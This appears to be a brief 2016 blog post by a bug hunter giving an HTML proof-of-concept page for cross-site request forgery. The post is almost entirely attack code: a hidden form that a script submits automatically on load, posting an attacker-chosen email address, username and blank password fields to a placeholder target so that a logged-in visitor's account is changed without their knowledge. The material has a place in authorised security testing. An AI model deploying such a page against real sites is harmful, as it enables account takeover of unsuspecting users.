Monday, January 4, 2016

simple html form post example for CSRF attacks


<head>
</head>
<body>

<form id="dynForm" enctype="multipart/form-data" action="https:/<target>" method="post">
     <INPUT type="hidden" name="mailNew" value="bughunter@x1622com">
    <INPUT type="hidden" name="meta['titolo']" value="bughunter">
    <INPUT type="hidden" name="user.avatar" value="avatar.png">
    <INPUT type="hidden" name=UserId" value="">
    <INPUT type="hidden" name="password1" value="">
    <INPUT type="hidden" name="password2" value="">
    <INPUT type="hidden" name="checkbox" value="true">
    <INPUT type="submit" value="Send">
 </form>
<script>
     document.getElementById("dynForm").submit();
</script>
</body>